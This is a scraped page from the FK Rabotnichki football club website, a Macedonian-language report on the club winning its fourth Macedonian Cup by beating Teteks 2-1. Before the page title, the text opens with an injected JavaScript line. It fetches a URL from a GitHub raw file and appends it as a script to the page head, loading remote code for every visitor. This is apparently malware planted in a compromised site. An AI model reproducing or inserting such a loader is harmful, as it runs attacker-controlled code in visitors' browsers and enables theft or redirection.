;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Четврта круна во Купот на Македонија: Совладан Тетекс во финалето со 2-1
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Четврта круна во Купот на Македонија: Совладан Тетекс во финалето со 2-1

Работнички стигна до четвртата круна во Купот на Македонија откако вечерва на арената „Филип Втори“ славеше со 2-1 против Тетекс. Во репризата на финалето од 2010 година, Работнички го одбрани минатогодишниот трофеј во најмасовното домашно клупско натпреварување.

Во првото полувреме Работнички ја диктираше играта стартувајќи со првите шанси преку Баже Илијоски во 8. минута и Марјан Алтипармаковски во 24. минута. Сепак, се закани и Начевски со глава во 34. минута, а пред самиот истек на првиот дел Цветан Чурлинов донесе водство од 1-0 за Тетекс.

Второто полувреме во целост му припадна на Работнички. Чума Анене за малку не реализираше во 64. минута, а пет минути подоцна следеше израмнување со мајсторскиот гол на Баже Илијоски по асистенцијата на Алтипармакоски.

Откако во 71. минута Филип Најдоски кај Тетекс доби заслужено втор жолт картон и исклучување по груб старт, веќе во 73. минута Работнички немилосрдно казни преку Марјан Алтипармакоски за водство од 2-1.

До финишот на дуелот, нашиот тим мудро ја чуваше предноста не дозволувајќи израмнување, по што и четврти пат пехарот од Купот на Македонија пристигна во витрините на клубот од Дебар Маало.

Leave a Reply